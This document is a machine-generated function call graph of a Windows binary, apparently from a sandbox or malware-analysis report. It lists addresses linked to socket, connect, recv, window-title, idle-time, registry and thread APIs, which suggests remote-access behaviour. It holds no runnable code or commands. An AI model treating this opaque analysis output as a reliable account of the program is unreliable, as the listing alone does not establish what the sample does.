53524->53536 53525->53523 53527 4485a6 GetProcAddress 53525->53527 53528 4485b6 __crt_fast_encode_pointer 53527->53528 53528->53523 53530 435036 IsProcessorFeaturePresent 53529->53530 53531 435034 53529->53531 53533 435078 53530->53533 53531->53519 53543 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53533->53543 53535 43515b 53535->53519 53537 448607 LoadLibraryExW 53536->53537 53542 4485fc 53536->53542 53538 448624 GetLastError 53537->53538 53539 44863c 53537->53539 53538->53539 53540 44862f LoadLibraryExW 53538->53540 53541 448653 FreeLibrary 53539->53541 53539->53542 53540->53539 53541->53542 53542->53524 53543->53535 53544 41e04e 53545 41e063 ctype ___scrt_fastfail 53544->53545 53546 41e266 53545->53546 53547 432f55 21 API calls 53545->53547 53552 41e21a 53546->53552 53558 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53546->53558 53551 41e213 ___scrt_fastfail 53547->53551 53549 41e277 53549->53552 53559 432f55 53549->53559 53551->53552 53553 432f55 21 API calls 53551->53553 53556 41e240 ___scrt_fastfail 53553->53556 53554 41e2b0 ___scrt_fastfail 53554->53552 53564 4335db 53554->53564 53556->53552 53557 432f55 21 API calls 53556->53557 53557->53546 53558->53549 53560 432f63 53559->53560 53561 432f5f 53559->53561 53562 43bda0 ___std_exception_copy 21 API calls 53560->53562 53561->53554 53563 432f68 53562->53563 53563->53554 53567 4334fa 53564->53567 53566 4335e3 53566->53552 53568 433513 53567->53568 53572 433509 53567->53572 53569 432f55 21 API calls 53568->53569 53568->53572 53570 433534 53569->53570 53570->53572 53573 4338c8 CryptAcquireContextA 53570->53573 53572->53566 53574 4338e4 53573->53574 53575 4338e9 CryptGenRandom 53573->53575 53574->53572 53575->53574 53576 4338fe CryptReleaseContext 53575->53576 53576->53574 53577 426c6d 53583 426d42 recv 53577->53583 53584 426a77 53585 426a8c 53584->53585 53593 426b1e 53584->53593 53586 426bae 53585->53586 53589 426ad9 53585->53589 53590 426b0e 53585->53590 53591 426b83 53585->53591 53585->53593 53596 426b4e 53585->53596 53598 426bd5 53585->53598 53612 424f6e 49 API calls ctype 53585->53612 53586->53593 53586->53598 53600 425b72 53586->53600 53589->53590 53589->53593 53613 41fbfd 52 API calls 53589->53613 53590->53593 53590->53596 53614 424f6e 49 API calls ctype 53590->53614 53591->53586 53616 425781 21 API calls 53591->53616 53596->53591 53596->53593 53615 41fbfd 52 API calls 53596->53615 53598->53593 53617 4261e6 28 API calls 53598->53617 53601 425b91 ___scrt_fastfail 53600->53601 53604 425ba0 53601->53604 53610 425bc5 53601->53610 53618 41ec4c 21 API calls 53601->53618 53602 425ba5 53608 425bae 53602->53608 53602->53610 53620 41daf0 49 API calls 53602->53620 53604->53602 53604->53610 53619 420669 46 API calls 53604->53619 53607 425c48 53607->53610 53611 432f55 21 API calls 53607->53611 53608->53610 53621 424d96 21 API calls 2 library calls 53608->53621 53610->53598 53611->53602 53612->53589 53613->53589 53614->53596 53615->53596 53616->53586 53617->53593 53618->53604 53619->53607 53620->53608 53621->53610 53622 4165db 53633 401e65 53622->53633 53624 4165eb 53625 4020f6 28 API calls 53624->53625 53626 4165f6 53625->53626 53627 401e65 22 API calls 53626->53627 53628 416601 53627->53628 53629 4020f6 28 API calls 53628->53629 53630 41660c 53629->53630 53638 412965 53630->53638 53634 401e6d 53633->53634 53635 401e75 53634->53635 53657 402158 22 API calls 53634->53657 53635->53624 53658 40482d 53638->53658 53640 412979 53665 4048c8 connect 53640->53665 53644 41299a 53730 402f10 53644->53730 53647 404aa1 61 API calls 53648 4129ae 53647->53648 53649 401fd8 11 API calls 53648->53649 53650 4129b6 53649->53650 53735 404c10 53650->53735 53653 401fd8 11 API calls 53654 4129cc 53653->53654 53655 401fd8 11 API calls 53654->53655 53656 4129d4 53655->53656 53659 404846 socket 53658->53659 53660 404839 53658->53660 53661 404860 CreateEventW 53659->53661 53662 404842 53659->53662 53753 40489e WSAStartup 53660->53753 53661->53640 53662->53640 53664 40483e 53664->53659 53664->53662 53666 404a1b 53665->53666 53667 4048ee 53665->53667 53668 40497e 53666->53668 53669 404a21 WSAGetLastError 53666->53669 53667->53668 53670 404923 53667->53670 53754 40531e 53667->53754 53725 402f31 53668->53725 53669->53668 53671 404a31 53669->53671 53789 420cf1 27 API calls 53670->53789 53673 404932 53671->53673 53674 404a36 53671->53674 53679 402093 28 API calls 53673->53679 53794 41cb72 30 API calls 53674->53794 53676 40490f 53759 402093 53676->53759 53678 40492b 53678->53673 53682 404941 53678->53682 53683 404a80 53679->53683 53681 404a40 53795 4052fd 28 API calls 53681->53795 53689 404950 53682->53689 53690 404987 53682->53690 53686 402093 28 API calls 53683->53686 53691 404a8f 53686->53691 53693 402093 28 API calls 53689->53693 53791 421ad1 54 API calls 53690->53791 53694 41b580 80 API calls 53691->53694 53697 40495f 53693->53697 53694->53668 53700 402093 28 API calls 53697->53700 53698 40498f 53701 4049c4 53698->53701 53702 404994 53698->53702 53706 40496e 53700->53706 53793 420e97 28 API calls 53701->53793 53704 402093 28 API calls 53702->53704 53708 4049a3 53704->53708 53709 41b580 80 API calls 53706->53709 53711 402093 28 API calls 53708->53711 53712 404973 53709->53712 53710 4049cc 53713 4049f9 CreateEventW CreateEventW 53710->53713 53715 402093 28 API calls 53710->53715 53714 4049b2 53711->53714 53790 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53712->53790 53713->53668 53716 41b580 80 API calls 53714->53716 53718 4049e2 53715->53718 53719 4049b7 53716->53719 53720 402093 28 API calls 53718->53720 53792 421143 52 API calls 53719->53792 53722 4049f1 53720->53722 53723 41b580 80 API calls 53722->53723 53724 4049f6 53723->53724 53724->53713 53726 4020df 11 API calls 53725->53726 53727 402f3d 53726->53727 53728 4032a0 28 API calls 53727->53728 53729 402f59 53728->53729 53729->53644 53846 401fb0 53730->53846 53732 402f1e 53733 402055 11 API calls 53732->53733 53734 402f2d 53733->53734 53734->53647 53736 4020df 11 API calls 53735->53736 53737 404c27 53736->53737 53738 4020df 11 API calls 53737->53738 53741 404c30 53738->53741 53739 43bda0 ___std_exception_copy 21 API calls 53739->53741 53741->53739 53742 4020b7 28 API calls 53741->53742 53743 404ca1 53741->53743 53747 401fd8 11 API calls 53741->53747 53849 404b96 53741->53849 53855 401fe2 53741->53855 53864 404cc3 53741->53864 53742->53741 53876 404e26 WaitForSingleObject 53743->53876 53747->53741 53748 401fd8 11 API calls 53749 404cb1 53748->53749 53750 401fd8 11 API calls 53749->53750 53751 404cba 53750->53751 53751->53653 53753->53664 53755 4020df 11 API calls 53754->53755 53756 40532a 53755->53756 53796 4032a0 53756->53796 53758 405346 53758->53676 53760 40209b 53759->53760 53761 4023ce 11 API calls 53760->53761 53762 4020a6 53761->53762 53800 4024ed 53762->53800 53765 41b580 53766 41b631 53765->53766 53767 41b596 GetLocalTime 53765->53767 53769 401fd8 11 API calls 53766->53769 53768 40531e 28 API calls 53767->53768 53770 41b5d8 53768->53770 53771 41b639 53769->53771 53804 406383 53770->53804 53773 401fd8 11 API calls 53771->53773 53775 41b641 53773->53775 53775->53670 53776 402f10 28 API calls 53777 41b5f0 53776->53777 53778 406383 28 API calls 53777->53778 53779 41b5fc 53778->53779 53809 40723b 77 API calls 53779->53809 53781 41b60a 53782 401fd8 11 API calls 53781->53782 53783 41b616 53782->53783 53784 401fd8 11 API calls 53783->53784 53785 41b61f 53784->53785 53786 401fd8 11 API calls 53785->53786 53787 41b628 53786->53787 53788 401fd8 11 API calls 53787->53788 53788->53766 53789->53678 53790->53668 53791->53698 53792->53712 53793->53710 53794->53681 53798 4032aa 53796->53798 53797 4032c9 53797->53758 53798->53797 53799 4028e8 28 API calls 53798->53799 53799->53797 53801 4024f9 53800->53801 53802 40250a 28 API calls 53801->53802 53803 4020b1 53802->53803 53803->53765 53810 4051ef 53804->53810 53806 406391 53814 402055 53806->53814 53809->53781 53811 4051fb 53810->53811 53820 405274 53811->53820 53813 405208 53813->53806 53815 402061 53814->53815 53816 4023ce 11 API calls 53815->53816 53817 40207b 53816->53817 53842 40267a 53817->53842 53821 405282 53820->53821 53822 405288 53821->53822 53823 40529e 53821->53823 53831 4025f0 53822->53831 53825 4052f5 53823->53825 53826 4052b6 53823->53826 53840 4028a4 22 API calls 53825->53840 53829 4028e8 28 API calls 53826->53829 53830 40529c 53826->53830 53829->53830 53830->53813 53832 402888 22 API calls 53831->53832 53833 402602 53832->53833 53834 402672 53833->53834 53835 402629 53833->53835 53841 4028a4 22 API calls 53834->53841 53836 40263b 53835->53836 53839 4028e8 28 API calls 53835->53839 53836->53830 53839->53836 53843 40268b 53842->53843 53844 4023ce 11 API calls 53843->53844 53845 40208d 53844->53845 53845->53776 53847 4025f0 28 API calls 53846->53847 53848 401fbd 53847->53848 53848->53732 53850 404ba0 WaitForSingleObject 53849->53850 53851 404bcd recv 53849->53851 53889 421107 54 API calls 53850->53889 53852 404be0 53851->53852 53852->53741 53854 404bbc SetEvent 53854->53852 53856 401ff1 53855->53856 53863 402039 53855->53863 53857 4023ce 11 API calls 53856->53857 53858 401ffa 53857->53858 53859 40203c 53858->53859 53861 402015 53858->53861 53860 40267a 11 API calls 53859->53860 53860->53863 53890 403098 28 API calls 53861->53890 53863->53741 53865 4020df 11 API calls 53864->53865 53874 404cde 53865->53874 53866 404e13 53867 401fd8 11 API calls 53866->53867 53868 404e1c 53867->53868 53868->53741 53869 4041a2 28 API calls 53869->53874 53870 401fe2 28 API calls 53870->53874 53871 4020f6 28 API calls 53871->53874 53874->53866 53874->53869 53874->53870 53874->53871 53875 401fd8 11 API calls 53874->53875 53891 401fc0 53874->53891 53875->53874 53877 404e40 SetEvent CloseHandle 53876->53877 53878 404e57 closesocket 53876->53878 53879 404ca8 53877->53879 53880 404e64 53878->53880 53879->53748 53881 404e7a 53880->53881 54222 4050e4 84 API calls 53880->54222 53883 404e8c WaitForSingleObject 53881->53883 53884 404ece SetEvent CloseHandle 53881->53884 54223 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53883->54223 53884->53879 53886 404e9b SetEvent WaitForSingleObject 54224 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53886->54224 53888 404eb3 SetEvent CloseHandle CloseHandle 53888->53884 53889->53854 53890->53863 53892 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53891->53892 53893 401fc9 53891->53893 53892->53874 53896 415b25 53892->53896 53895 4025e0 28 API calls 53893->53895 53895->53892 53897 4020f6 28 API calls 53896->53897 53898 415b47 SetEvent 53897->53898 53899 415b5c 53898->53899 53975 4041a2 53899->53975 53902 4020f6 28 API calls 53903 415b86 53902->53903 53904 4020f6 28 API calls 53903->53904 53905 415b98 53904->53905 53978 41beac 53905->53978 53908 415bc1 GetTickCount 54000 41bc1f 53908->54000 53909 415d20 53913 415d34 53909->53913 53974 415d11 53909->53974 53910 401e8d 11 API calls 53912 4170cd 53910->53912 53916 401fd8 11 API calls 53912->53916 54041 4050e4 84 API calls 53913->54041 53919 4170d9 53916->53919 53918 415d04 53918->53974 53921 401fd8 11 API calls 53919->53921 53920 415bde 53923 41bc1f 28 API calls 53920->53923 53922 4170e5 53921->53922 53924 415be9 53923->53924 54006 41bb27 53924->54006 53929 401e65 22 API calls 53930 415c13 53929->53930 53931 402f31 28 API calls 53930->53931 53932 415c21 53931->53932 54015 402ea1 28 API calls 53932->54015 53934 415c30 53935 402f10 28 API calls 53934->53935 53936 415c3f 53935->53936 54016 402ea1 28 API calls 53936->54016 53938 415c4e 53939 402f10 28 API calls 53938->53939 53940 415c5a 53939->53940 54017 402ea1 28 API calls 53940->54017 53942 415c64 53943 404aa1 61 API calls 53942->53943 53944 415c73 53943->53944 53945 401fd8 11 API calls 53944->53945 53946 415c7c 53945->53946 53947 401fd8 11 API calls 53946->53947 53948 415c88 53947->53948 53949 401fd8 11 API calls 53948->53949 53950 415c94 53949->53950 53951 401fd8 11 API calls 53950->53951 53952 415ca0 53951->53952 53953 401fd8 11 API calls 53952->53953 53954 415cac 53953->53954 53955 401fd8 11 API calls 53954->53955 53956 415cb8 53955->53956 54018 401f09 53956->54018 53959 401fd8 11 API calls 53960 415cca 53959->53960 53961 401fd8 11 API calls 53960->53961 53962 415cd3 53961->53962 53963 401e65 22 API calls 53962->53963 53964 415cde 53963->53964 54021 43bb2c 53964->54021 53967 415cf0 53970 415d09 53967->53970 53971 415cfe 53967->53971 53968 415d16 53969 401e65 22 API calls 53968->53969 53969->53909 54026 404f51 53970->54026 54025 404ff4 82 API calls 53971->54025 53974->53910 54042 40423a 53975->54042 53979 4020df 11 API calls 53978->53979 53980 41bebf 53979->53980 53983 41bf31 53980->53983 53986 4041a2 28 API calls 53980->53986 53991 401fe2 28 API calls 53980->53991 53995 401fd8 11 API calls 53980->53995 53999 41bf2f 53980->53999 54048 41cec5 53980->54048 53981 401fd8 11 API calls 53982 41bf61 53981->53982 53984 401fd8 11 API calls 53982->53984 53985 4041a2 28 API calls 53983->53985 53987 41bf69 53984->53987 53988 41bf3d 53985->53988 53986->53980 53989 401fd8 11 API calls 53987->53989 53990 401fe2 28 API calls 53988->53990 53992 415ba1 53989->53992 53993 41bf46 53990->53993 53991->53980 53992->53908 53992->53909 53992->53974 53994 401fd8 11 API calls 53993->53994 53996 41bf4e 53994->53996 53995->53980 53997 41cec5 28 API calls 53996->53997 53997->53999 53999->53981 54084 441ed1 54000->54084 54003 402093 28 API calls 54004 415bd2 54003->54004 54005 41bb77 GetLastInputInfo GetTickCount 54004->54005 54005->53920 54093 436f10 54006->54093 54011 41bdaf 54012 41bdbc 54011->54012 54013 4020b7 28 API calls 54012->54013 54014 415c05 54013->54014 54014->53929 54015->53934 54016->53938 54017->53942 54019 402252 11 API calls 54018->54019 54020 401f12 54019->54020 54020->53959 54022 43bb45 _strftime 54021->54022 54147 43ae83 54022->54147 54024 415ceb 54024->53967 54024->53968 54025->53918 54027 404fea 54026->54027 54028 404f65 54026->54028 54027->53974 54029 404f6e 54028->54029 54030 404fc0 CreateEventA CreateThread 54028->54030 54031 404f7d GetLocalTime 54028->54031 54029->54030 54030->54027 54218 405150 54030->54218 54032 41bc1f 28 API calls 54031->54032 54033 404f91 54032->54033 54217 4052fd 28 API calls 54033->54217 54041->53918 54043 404243 54042->54043 54044 4023ce 11 API calls 54043->54044 54045 40424e 54044->54045 54046 402569 28 API calls 54045->54046 54047 4041b5 54046->54047 54047->53902 54049 41ced2 54048->54049 54050 41cf31 54049->54050 54054 41cee2 54049->54054 54051 41cf4b 54050->54051 54052 41d071 28 API calls 54050->54052 54068 41d1d7 28 API calls 54051->54068 54052->54051 54055 41cf1a 54054->54055 54059 41d071 54054->54059 54067 41d1d7 28 API calls 54055->54067 54056 41cf2d 54056->53980 54061 41d079 54059->54061 54060 41d0ab 54060->54055 54061->54060 54062 41d0af 54061->54062 54065 41d093 54061->54065 54079 402725 22 API calls 54062->54079 54069 41d0e2 54065->54069 54067->54056 54068->54056 54070 41d0ec __EH_prolog 54069->54070 54080 402717 22 API calls 54070->54080 54072 41d0ff 54081 41d1ee 11 API calls 54072->54081 54074 41d125 54075 41d15d 54074->54075 54082 402730 11 API calls 54074->54082 54075->54060 54077 41d144 54083 402712 11 API calls std::_Deallocate 54077->54083 54080->54072 54081->54074 54082->54077 54083->54075 54085 441edd 54084->54085 54088 441ccd 54085->54088 54087 41bc43 54087->54003 54089 441ce4 54088->54089 54091 441d1b __cftoe 54089->54091 54092 44062d 20 API calls __dosmaperr 54089->54092 54091->54087 54092->54091 54094 41bb46 GetForegroundWindow GetWindowTextW 54093->54094 54095 40417e 54094->54095 54096 404186 54095->54096 54101 402252 54096->54101 54098 404191 54105 4041bc 54098->54105 54102 40225c 54101->54102 54103 4022ac 54101->54103 54102->54103 54109 402779 11 API calls std::_Deallocate 54102->54109 54103->54098 54106 4041c8 54105->54106 54110 4041d9 54106->54110 54108 40419c 54108->54011 54109->54103 54111 4041e9 54110->54111 54112 404206 54111->54112 54113 4041ef 54111->54113 54127 4027e6 54112->54127 54117 404267 54113->54117 54116 404204 54116->54108 54118 402888 22 API calls 54117->54118 54119 40427b 54118->54119 54120 404290 54119->54120 54121 4042a5 54119->54121 54138 4042df 22 API calls 54120->54138 54122 4027e6 28 API calls 54121->54122 54126 4042a3 54122->54126 54124 404299 54139 402c48 22 API calls 54124->54139 54126->54116 54128 4027ef 54127->54128 54129 402851 54128->54129 54130 4027f9 54128->54130 54146 4028a4 22 API calls 54129->54146 54133 402802 54130->54133 54134 402815 54130->54134 54140 402aea 54133->54140 54136 402813 54134->54136 54137 402252 11 API calls 54134->54137 54136->54116 54137->54136 54138->54124 54139->54126 54141 402af4 __EH_prolog 54140->54141 54142 402e45 22 API calls 54141->54142 54144 402b60 54142->54144 54143 402252 11 API calls 54145 402bce 54143->54145 54144->54143 54145->54136 54163 43ba8a 54147->54163 54149 43aed0 54169 43a837 54149->54169 54150 43ae95 54150->54149 54151 43aeaa 54150->54151 54154 43aeaf __cftoe 54150->54154 54168 44062d 20 API calls __dosmaperr 54151->54168 54154->54024 54156 43aedc 54158 43af0b 54156->54158 54177 43bacf 40 API calls __Toupper 54156->54177 54157 43af77 54179 43ba36 20 API calls 2 library calls 54157->54179 54158->54157 54178 43ba36 20 API calls 2 library calls 54158->54178 54161 43b03e _strftime 54161->54154 54180 44062d 20 API calls __dosmaperr 54161->54180 54164 43baa2 54163->54164 54165 43ba8f 54163->54165 54164->54150 54181 44062d 20 API calls __dosmaperr 54165->54181 54167 43ba94 __cftoe 54167->54150 54168->54154 54170 43a854 54169->54170 54176 43a84a 54169->54176 54170->54176 54182 448295 GetLastError 54170->54182 54172 43a875 54203 4483e4 36 API calls __Getctype 54172->54203 54174 43a88e 54204 448411 36 API calls __fassign 54174->54204 54176->54156 54177->54156 54178->54157 54179->54161 54180->54154 54181->54167 54183 4482b7 54182->54183 54184 4482ab 54182->54184 54206 445b74 20 API calls 3 library calls 54183->54206 54205 44883c 11 API calls 2 library calls 54184->54205 54187 4482b1 54187->54183 54189 448300 SetLastError 54187->54189 54188 4482c3 54190 4482cb 54188->54190 54213 448892 11 API calls 2 library calls 54188->54213 54189->54172 54207 446802 54190->54207 54192 4482e0 54192->54190 54194 4482e7 54192->54194 54214 448107 20 API calls FindHandlerForForeignException 54194->54214 54195 4482d1 54197 44830c SetLastError 54195->54197 54215 446175 36 API calls 4 library calls 54197->54215 54198 4482f2 54200 446802 _free 20 API calls 54198->54200 54202 4482f9 54200->54202 54201 448318 54202->54189 54202->54197 54203->54174 54204->54176 54205->54187 54206->54188 54208 44680d HeapFree 54207->54208 54209 446836 _free 54207->54209 54208->54209 54210 446822 54208->54210 54209->54195 54216 44062d 20 API calls __dosmaperr 54210->54216 54212 446828 GetLastError 54212->54209 54213->54192 54214->54198 54215->54201 54216->54212 54221 40515c 102 API calls 54218->54221 54220 405159 54221->54220 54222->53881 54223->53886 54224->53888 54225 44839e 54233 448790 54225->54233 54229 4483ba 54230 4483c7 54229->54230 54241 4483ca 11 API calls 54229->54241 54232 4483b2 54234 44854a FindHandlerForForeignException 5 API calls 54233->54234 54235 4487b7 54234->54235 54236 4487cf TlsAlloc 54235->54236 54237 4487c0 54235->54237 54236->54237 54238 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54237->54238 54239 4483a8 54238->54239 54239->54232 54240 448319 20 API calls 3 library calls 54239->54240 54240->54229 54241->54232 54242 100020db 54245 100020e7 ___scrt_is_nonwritable_in_current_image 54242->54245 54243 100020f6 54244 10002110 dllmain_raw 54244->54243 54246 1000212a 54244->54246 54245->54243 54245->54244 54249 1000210b 54245->54249 54255 10001eec 54246->54255 54248 10002177 54248->54243 54250 10001eec 29 API calls 54248->54250 54249->54243 54249->54248 54252 10001eec 29 API calls 54249->54252 54251 1000218a 54250->54251 54251->54243 54253 10002193 dllmain_raw 54251->54253 54254 1000216d dllmain_raw 54252->54254 54253->54243 54254->54248 54256 10001ef7 54255->54256 54257 10001f2a dllmain_crt_process_detach 54255->54257 54258 10001f1c dllmain_crt_process_attach 54256->54258 54259 10001efc 54256->54259 54264 10001f06 54257->54264 54258->54264 54260 10001f01 54259->54260 54261 10001f12 54259->54261 54260->54264 54265 1000240b 25 API calls 54260->54265 54266 100023ec 27 API calls 54261->54266 54264->54249 54265->54264 54266->54264 54267 434918 54268 434924 ___DestructExceptionObject 54267->54268 54294 434627 54268->54294 54270 43492b 54272 434954 54270->54272 54600 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54270->54600 54280 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54272->54280 54305 4442d2 54272->54305 54276 434973 ___DestructExceptionObject 54277 4349f3 54313 434ba5 54277->54313 54280->54277 54601 443487 36 API calls 5 library calls 54280->54601 54295 434630 54294->54295 54606 434cb6 IsProcessorFeaturePresent 54295->54606 54297 43463c 54607 438fb1 54297->54607 54299 434641 54300 434645 54299->54300 54616 44415f 54299->54616 54300->54270 54303 43465c 54303->54270 54306 4442e9 54305->54306 54307 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54306->54307 54308 43496d 54307->54308 54308->54276 54309 444276 54308->54309 54310 4442a5 54309->54310 54311 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54310->54311 54312 4442ce 54311->54312 54312->54280 54314 436f10 ___scrt_fastfail 54313->54314 54315 434bb8 GetStartupInfoW 54314->54315 54316 4349f9 54315->54316 54317 444223 54316->54317 54666 44f0d9 54317->54666 54319 44422c 54321 434a02 54319->54321 54670 446895 36 API calls 54319->54670 54322 40ea00 54321->54322 54800 41cbe1 LoadLibraryA GetProcAddress 54322->54800 54324 40ea1c GetModuleFileNameW 54805 40f3fe 54324->54805 54326 40ea38 54327 4020f6 28 API calls 54326->54327 54328 40ea47 54327->54328 54329 4020f6 28 API calls 54328->54329 54330 40ea56 54329->54330 54331 41beac 28 API calls 54330->54331 54332 40ea5f 54331->54332 54820 40fb52 54332->54820 54334 40ea68 54335 401e8d 11 API calls 54334->54335 54336 40ea71 54335->54336 54337 40ea84 54336->54337 54338 40eace 54336->54338 55014 40fbee 118 API calls 54337->55014 54340 401e65 22 API calls 54338->54340 54342 40eade 54340->54342 54341 40ea96 54343 401e65 22 API calls 54341->54343 54345 401e65 22 API calls 54342->54345 54344 40eaa2 54343->54344 55015 410f72 36 API calls __EH_prolog 54344->55015 54346 40eafd 54345->54346 54347 40531e 28 API calls 54346->54347 54349 40eb0c 54347->54349 54351 406383 28 API calls 54349->54351 54350 40eab4 55016 40fb9f 78 API calls 54350->55016 54353 40eb18 54351->54353 54355 401fe2 28 API calls 54353->54355 54354 40eabd 55017 40f3eb 71 API calls 54354->55017 54357 40eb24 54355->54357 54358 401fd8 11 API calls 54357->54358 54359 40eb2d 54358->54359 54361 401fd8 11 API calls 54359->54361 54363 40eb36 54361->54363 54364 401e65 22 API calls 54363->54364 54365 40eb3f 54364->54365 54366 401fc0 28 API calls 54365->54366 54367 40eb4a 54366->54367 54368 401e65 22 API calls 54367->54368 54369 40eb63 54368->54369 54370 401e65 22 API calls 54369->54370 54371 40eb7e 54370->54371 54372 40ebe9 54371->54372 55018 406c59 54371->55018 54373 401e65 22 API calls 54372->54373 54379 40ebf6 54373->54379 54375 40ebab 54376 401fe2 28 API calls 54375->54376 54377 40ebb7 54376->54377 54378 401fd8 11 API calls 54377->54378 54381 40ebc0 54378->54381 54380 40ec3d 54379->54380 54385 413584 3 API calls 54379->54385 54824 40d0a4 54380->54824 55023 413584 RegOpenKeyExA 54381->55023 54391 40ec21 54385->54391 54389 40f38a 55116 4139e4 30 API calls 54389->55116 54391->54380 55026 4139e4 30 API calls 54391->55026 54399 40f3a0 55117 4124b0 65 API calls ___scrt_fastfail 54399->55117 54600->54270 54601->54277 54606->54297 54608 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54607->54608 54620 43a4ba 54608->54620 54612 438fcc 54613 438fd7 54612->54613 54634 43a4f6 DeleteCriticalSection 54612->54634 54613->54299 54615 438fc4 54615->54299 54662 44fbe8 54616->54662 54619 438fda 8 API calls 3 library calls 54619->54300 54621 43a4c3 54620->54621 54623 43a4ec 54621->54623 54624 438fc0 54621->54624 54635 438eff 54621->54635 54640 43a4f6 DeleteCriticalSection 54623->54640 54624->54615 54626 43a46c 54624->54626 54655 438e14 54626->54655 54628 43a481 54628->54612 54629 43a476 54629->54628 54660 438ec2 6 API calls try_get_function 54629->54660 54631 43a48f 54632 43a49c 54631->54632 54661 43a49f 6 API calls ___vcrt_FlsFree 54631->54661 54632->54612 54634->54615 54641 438cf3 54635->54641 54638 438f36 InitializeCriticalSectionAndSpinCount 54639 438f22 54638->54639 54639->54621 54640->54624 54642 438d27 54641->54642 54643 438d23 54641->54643 54642->54638 54642->54639 54643->54642 54644 438d47 54643->54644 54648 438d93 54643->54648 54644->54642 54646 438d53 GetProcAddress 54644->54646 54647 438d63 __crt_fast_encode_pointer 54646->54647 54647->54642 54649 438dbb LoadLibraryExW 54648->54649 54653 438db0 54648->54653 54650 438dd7 GetLastError 54649->54650 54651 438def 54649->54651 54650->54651 54654 438de2 LoadLibraryExW 54650->54654 54652 438e06 FreeLibrary 54651->54652 54651->54653 54652->54653 54653->54643 54654->54651 54656 438cf3 try_get_function 5 API calls 54655->54656 54657 438e2e 54656->54657 54658 438e46 TlsAlloc 54657->54658 54659 438e37 54657->54659 54659->54629 54660->54631 54661->54628 54665 44fc01 54662->54665 54663 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54664 43464e 54663->54664 54664->54303 54664->54619 54665->54663 54667 44f0e2 54666->54667 54669 44f0eb 54666->54669 54671 44efd8 54667->54671 54669->54319 54670->54319 54672 448295 FindHandlerForForeignException 36 API calls 54671->54672 54673 44efe5 54672->54673 54691 44f0f7 54673->54691 54675 44efed 54700 44ed6c 54675->54700 54680 44f047 54683 446802 _free 20 API calls 54680->54683 54685 44f004 54683->54685 54684 44f042 54724 44062d 20 API calls __dosmaperr 54684->54724 54685->54669 54687 44f08b 54687->54680 54725 44ec42 20 API calls 54687->54725 54688 44f05f 54688->54687 54689 446802 _free 20 API calls 54688->54689 54689->54687 54692 44f103 ___DestructExceptionObject 54691->54692 54693 448295 FindHandlerForForeignException 36 API calls 54692->54693 54698 44f10d 54693->54698 54695 44f191 ___DestructExceptionObject 54695->54675 54698->54695 54699 446802 _free 20 API calls 54698->54699 54726 446175 36 API calls 4 library calls 54698->54726 54727 445909 EnterCriticalSection 54698->54727 54728 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54698->54728 54699->54698 54701 43a837 __fassign 36 API calls 54700->54701 54702 44ed7e 54701->54702 54703 44ed8d GetOEMCP 54702->54703 54704 44ed9f 54702->54704 54705 44edb6 54703->54705 54704->54705 54706 44eda4 GetACP 54704->54706 54705->54685 54707 4461b8 54705->54707 54706->54705 54708 4461f6 54707->54708 54709 4461c6 ___crtLCMapStringA 54707->54709 54730 44062d 20 API calls __dosmaperr 54708->54730 54709->54708 54710 4461e1 RtlAllocateHeap 54709->54710 54729 443001 7 API calls 2 library calls 54709->54729 54710->54709 54712 4461f4 54710->54712 54712->54680 54714 44f199 54712->54714 54715 44ed6c 38 API calls 54714->54715 54716 44f1b8 54715->54716 54718 44f209 IsValidCodePage 54716->54718 54721 44f1bf 54716->54721 54723 44f22e ___scrt_fastfail 54716->54723 54717 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54719 44f03a 54717->54719 54720 44f21b GetCPInfo 54718->54720 54718->54721 54719->54684 54719->54688 54720->54721 54720->54723 54721->54717 54731 44ee44 GetCPInfo 54723->54731 54724->54680 54725->54680 54726->54698 54727->54698 54728->54698 54729->54709 54730->54712 54732 44ef28 54731->54732 54736 44ee7e 54731->54736 54735 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54732->54735 54738 44efd4 54735->54738 54741 4511ac 54736->54741 54738->54721 54740 44aee6 _swprintf 41 API calls 54740->54732 54742 43a837 __fassign 36 API calls 54741->54742 54743 4511cc MultiByteToWideChar 54742->54743 54745 45120a 54743->54745 54753 4512a2 54743->54753 54747 45122b __alloca_probe_16 ___scrt_fastfail 54745->54747 54748 4461b8 ___crtLCMapStringA 21 API calls 54745->54748 54746 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54749 44eedf 54746->54749 54750 45129c 54747->54750 54752 451270 MultiByteToWideChar 54747->54752 54748->54747 54755 44aee6 54749->54755 54760 435ecd 20 API calls _free 54750->54760 54752->54750 54754 45128c GetStringTypeW 54752->54754 54753->54746 54754->54750 54756 43a837 __fassign 36 API calls 54755->54756 54757 44aef9 54756->54757 54761 44acc9 54757->54761 54760->54753 54762 44ace4 ___crtLCMapStringA 54761->54762 54763 44ad0a MultiByteToWideChar 54762->54763 54764 44ad34 54763->54764 54765 44aebe 54763->54765 54769 4461b8 ___crtLCMapStringA 21 API calls 54764->54769 54770 44ad55 __alloca_probe_16 54764->54770 54766 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54765->54766 54767 44aed1 54766->54767 54767->54740 54768 44ad9e MultiByteToWideChar 54771 44adb7 54768->54771 54783 44ae0a 54768->54783 54769->54770 54770->54768 54770->54783 54788 448c33 54771->54788 54775 44ae19 54777 4461b8 ___crtLCMapStringA 21 API calls 54775->54777 54781 44ae3a __alloca_probe_16 